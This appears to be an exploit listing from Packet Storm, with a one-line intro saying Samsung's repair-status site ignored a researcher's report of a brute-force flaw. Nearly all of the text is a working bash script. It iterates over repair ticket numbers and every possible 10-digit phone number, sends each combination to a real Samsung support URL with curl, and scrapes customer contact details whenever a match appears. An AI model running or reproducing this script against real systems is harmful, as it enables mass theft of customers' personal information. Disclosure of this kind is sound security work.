Samsung's repair system has ignored a researcher's plea to fix a flaw that allows attackers to brute force customer information.
a18220a56ac019b9c18e63d19d16b0a360bb63c7c51eb8152f27d55165466313#!/bin/bash
#
for t in {4136987977..4136989977}; do
echo "testing ticket $t"
for i in {2000000000..9999999999}; do
echo "testing telephone $i"
p1=$(echo $i | cut --characters 1-3)
p2=$(echo $i | cut --characters 4-6)
p3=$(echo $i | cut --characters 7-)
curl=$(curl -sS -d ticket_no=$t -d telephone1=$p1 -d telephone2=$p2 -d telephone3=$p3 http://support-us.samsung.com/cyber/repair_status_sta.jsp)
if echo $curl | grep "Contact Information Start" > /dev/null
then
echo "found telephone $i for ticket $t"
echo "***"
echo $curl | sed -e 's/</\n</g' | grep value | sed -n '/name=\"act\"/,/enc_strtel_number/p' | sed -n '/id=/','//p'
#echo $curl | w3m -dump -T text/html -cols=5000 | sed -n '/Repair Status/,/Picture of Issue/p'
echo "***"
break
fi;
done
done
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed